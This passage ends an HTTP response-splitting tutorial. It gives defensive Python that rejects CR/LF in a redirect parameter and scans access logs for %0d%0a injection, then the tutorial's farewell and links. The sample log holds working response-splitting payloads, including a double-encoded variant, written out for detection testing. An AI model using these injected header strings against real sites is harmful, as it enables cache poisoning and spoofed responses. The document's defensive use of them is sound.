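    The same idea in Python, as an added example that is not part of the original post or of any framework named in it: an assumed hardened stand-in for the tutorial's redirect.php that refuses CR/LF (or any other control character) in the page parameter before it can reach the Location header, plus a scan over constructed access-log lines that flags the %0d%0a-style requests shown earlier. All function names and the sample log are assumptions.

```python
import re
from urllib.parse import unquote

# Any CR, LF or other C0 control in a header value lets the response be split.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")

class HeaderInjection(ValueError):
    """Raised when a value that could split the response is supplied."""

def safe_header_value(value: str) -> str:
    """Percent-decode value (as the web server does before the handler sees
    ?page=...) and return it only if it holds no control character."""
    decoded = unquote(value)
    if _CONTROL.search(decoded):
        raise HeaderInjection("control character in header value")
    return decoded

def redirect_location(page: str) -> str:
    """Assumed hardened stand-in for the post's redirect.php: build the Location
    value, accepting only site-relative paths (no splitting, no off-site jump)."""
    target = safe_header_value(page)
    if not target.startswith("/") or target.startswith("//"):
        raise HeaderInjection("redirect target must be a site-relative path")
    return target

def is_safe_redirect(page: str) -> bool:
    """True if redirect_location() accepts the value."""
    try:
        redirect_location(page)
        return True
    except HeaderInjection:
        return False

def splitting_attempts(log_lines):
    """Return request targets from common-log-format lines whose query holds
    CR/LF after up to two rounds of decoding (catches %0d%0a and %250d%250a)."""
    hits = []
    for line in log_lines:
        request = line.split('"')[1:2]          # the quoted request line
        parts = request[0].split(" ") if request else []
        if len(parts) > 1 and _CONTROL.search(unquote(unquote(parts[1]))):
            hits.append(parts[1])
    return hits

# Constructed access-log lines for the detection check (not from the post).
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Dec/2009:16:00:00 +0000] "GET /redirect.php?page=/user/home.htm HTTP/1.1" 302 0',
    '10.0.0.9 - - [29/Dec/2009:16:00:01 +0000] "GET /redirect.php?page=%0d%0aContent-Length%3a%200%0d%0a%0d%0aHTTP/1.1%20200%20OK HTTP/1.1" 302 0',
    '10.0.0.9 - - [29/Dec/2009:16:00:02 +0000] "GET /redirect.php?page=%250d%250aX-Test%3a%201 HTTP/1.1" 302 0',
]
```

The second log line is the post's own injected request; the third shows why the scan decodes twice, since a double-encoded CRLF passes a single-decode check.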

    4.0 End

    Well this is goodbye. I hope you enjoyed and understood the tutorial. Please give suggestions and comments for enhancing the quality of this tut. Thanks!

    Resources:

    http://h4k.in/encoding/
    http://meyerweb.com/eric/tools/dencoder/
    http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
